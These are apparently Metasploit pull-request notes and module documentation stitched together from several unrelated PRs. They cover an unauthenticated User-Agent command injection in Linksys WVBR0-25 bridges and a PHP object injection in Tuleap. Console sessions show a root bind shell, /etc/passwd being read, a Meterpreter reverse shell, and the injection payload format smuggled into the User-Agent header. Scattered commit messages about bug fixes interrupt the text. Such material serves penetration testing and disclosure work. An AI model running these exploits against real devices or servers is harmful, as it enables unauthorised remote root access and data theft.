This module is for exploiting vulnerable Linksys WVBR0-25 wireless video bridges using CVE-2017-17411. The vuln in question involves a command injection due to improper sanitization of the User-Agent header. The module makes an initial GET request to the root of the web server and checks the result for a vulnerable firmware version. If vulnerable, it makes a subsequent GET request with the User-Agent set to `";<payload> #`. This can be verified against WVBR0-25 devices running firmware < 1.0.41.
Example console output:
msf > use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > info
Name: Linksys WVBR0-25 User-Agent Command Execution
Module: exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth
Platform: Unix
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2017-12-13
Provided by:
Available targets:
Id Name
-- ----
0 Automatic
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPORT 80 yes The target port
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload information:
Space: 1024
The Linksys WVBR0-25 Wireless Video Bridge, used by DirecTV to
connect wireless Genie cable boxes to the Genie DVR, is vulnerable
to OS command injection in version < 1.0.41 of the web management
portal via the User-Agent header. Authentication is not required to
exploit this vulnerability.
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > show payloads
Compatible Payloads
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat)
cmd/unix/generic normal Unix Command, Generic Command Execution
cmd/unix/reverse_netcat normal Unix Command Shell, Reverse TCP (via netcat)
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set RHOST
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit
[*] - Trying to access the device ...
[*] Started bind handler
[*] - Exploiting...
[*] Command shell session 1 opened ( -> at 2017-12-21 17:09:54 -0600
uid=0(root) gid=0(root)
Abort session 1? [y/N] y
[*] - Command shell session 1 closed. Reason: User exit
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/generic
payload => cmd/unix/generic
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set cmd cat /etc/passwd
cmd => cat /etc/passwd
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit
[*] - Trying to access the device ...
[*] - Exploiting...
[+] - Command sent successfully
[*] - Command output: root❌0:0::/:/bin/sh nobody❌99:99:Nobody:/:/bin/nologin sshd❌22:22::/var/empty:/sbin/nologin admin❌1000:1000:Admin User:/tmp/home/admin:/bin/sh quagga❌1001:1001:Quagga
[*] Exploit completed, but no session was created.
msf exploit(linksys_wvbr0_user_agent_exec_noauth) >
Variable on line 67 needs to be changed to "user" from "username" which was undefined and causing error during exploit execution.
[-] Exploit failed: NameError undefined local variable or method `username' for #<Msf::Modules::Mod6578706c6f69742f756e69782f7765626170702f77705f736c69646573686f7767616c6c6572795f75706c6f6164::MetasploitModule:0x0055c61ab093f8>
After changing the incorrect variable name from "username" to "user", the exploit completes.
Changes from a "hope we get at most one message at a time" model to
something beginning to resemble a state machine. Also logs error output
and fails the MSF module when the external module fails.
This PR contains a module to exploit [CVE-2017-7411](, a Second-Order PHP Object Injection vulnerability in Tuleap before version 9.7 that might allow authenticated users to execute arbitrary code with the permissions of the webserver. The module has been tested successfully with Tuleap versions 9.6, 8.19, and 8.8 deployed in a Docker container.
## Verification Steps
The quickest way to install an old version of Tuleap is through a Docker container. So install Docker on your system and go through the following steps:
1. Run `docker volume create --name tuleap`
2. Run `docker run -ti -e VIRTUAL_HOST=localhost -p 80:80 -p 443:443 -p 22:22 -v tuleap:/data enalean/tuleap-aio:9.6`
3. Run the following command in order to get the "Site admin password": `docker exec -ti <container_name> cat /data/root/.tuleap_passwd`
4. Go to `https://localhost/account/login.php` and log in as the "admin" user
5. Go to `https://localhost/admin/register_admin.php?page=admin_creation` and create a new user (NOT Restricted User)
6. Open a new browser session and log in as the newly created user
7. From this session go to `https://localhost/project/register.php` and make a new project (let's name it "test")
8. Come back to the admin session, go to `https://localhost/admin/approve-pending.php` and click on "Validate"
9. From the user session you can now browse to `https://localhost/projects/test/` and click on "Trackers" -> "Create a New Tracker"
10. Make a new tracker by choosing e.g. the "Bugs" template, fill all the fields and click on "Create"
11. Click on "Submit new artifact", fill all the fields and click on "Submit"
12. You can now test the MSF module by using the user account created at step n.5
NOTE: successful exploitation of this vulnerability requires an user account with permissions to submit a new Tracker artifact or access already existing artifacts, which means it might be exploited also by a "Restricted User".
## Demonstration
msf > use exploit/unix/webapp/tuleap_rest_unserialize_exec
msf exploit(tuleap_rest_unserialize_exec) > set RHOST localhost
msf exploit(tuleap_rest_unserialize_exec) > set USERNAME test
msf exploit(tuleap_rest_unserialize_exec) > set PASSWORD p4ssw0rd
msf exploit(tuleap_rest_unserialize_exec) > check
[*] Trying to login through the REST API...
[+] Login successful with test:p4ssw0rd
[*] Updating user preference with POP chain string...
[*] Retrieving the CSRF token for login...
[+] CSRF token: 089d56ffc3888c5bc90220f843f582aa
[+] Login successful with test:p4ssw0rd
[*] Triggering the POP chain...
[+] localhost:443 The target is vulnerable.
msf exploit(tuleap_rest_unserialize_exec) > set PAYLOAD php/meterpreter/reverse_tcp
msf exploit(tuleap_rest_unserialize_exec) > ifconfig docker0 | grep "inet:" | awk -F'[: ]+' '{ print $4 }'
msf exploit(tuleap_rest_unserialize_exec) > set LHOST
msf exploit(tuleap_rest_unserialize_exec) > exploit
[*] Started reverse TCP handler on
[*] Trying to login through the REST API...
[+] Login successful with test:p4ssw0rd
[*] Updating user preference with POP chain string...
[*] Retrieving the CSRF token for login...
[+] CSRF token: 01acd8380d98c587b37ddd75ba8ff6f7
[+] Login successful with test:p4ssw0rd
[*] Triggering the POP chain...
[*] Sending stage (33721 bytes) to
[*] Meterpreter session 1 opened ( -> at 2017-11-01 16:07:01 +0100
meterpreter > getuid
Server username: codendiadm (497)
The target object seems to have a typo where it is referred to as
“targetr” which I’d guess isn’t exactly what we’d like to do in this
case. So, I’ve changed that to “target” in order to work.
So, I’ve simply fixed that small typo.